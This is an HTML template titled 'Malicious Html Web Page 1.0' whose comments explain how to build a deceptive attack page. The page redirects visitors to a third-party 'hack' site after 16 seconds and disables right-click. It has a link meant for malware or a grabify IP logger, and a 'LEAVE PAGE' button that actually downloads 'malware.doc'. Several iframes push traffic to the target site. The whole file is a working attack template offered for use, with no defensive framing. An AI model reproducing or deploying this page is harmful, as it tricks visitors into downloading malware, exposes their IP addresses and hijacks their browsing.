<!DOCTYPE html>
<html>
<head>
<!--redirects users traffic to target after 16 seconds-->
<meta http-equiv="refresh" content="16;http://www.sterbenos.wixsite.com/hack" />
<title>Malicious Html Web Page 1.0</title>
</head>
<!—background—>
<body style="background-color:black;">
<!--disable right clicking page oncontext menu-->
<body oncontextmenu="return false;">
<body>
<p style="color:red;font-size:50;">
<strong>HELLO USER!!</
strong> 
<!—malware link goes here—>
<a href="http://google.com/">Malware or target link grabify ect.</a> 
<!-- leave button that will download malware file-->
<form method="get" action="malware.doc">
   <button type="submit">LEAVE PAGE</button>
</form>

<!--using iframes to send traffic to target site, you could add alot more iframes-->
<iframe frameborder="1" width="100" height="100" src="http://www.sterbenos.wixsite.com/hack"></iframe>
<iframe frameborder="1" width="100" height="100" src="http://www.sterbenos.wixsite.com/hack"></iframe>
<iframe frameborder="1" width="100" height="100" src="http://www.sterbenos.wixsite.com/hack"></iframe>
<iframe frameborder="1" width="100" height="100" src="http://www.sterbenos.wixsite.com/hack"></iframe>
<iframe frameborder="1" width="100" height="100" src="http://www.sterbenos.wixsite.com/hack"></iframe>




</body>
</html>
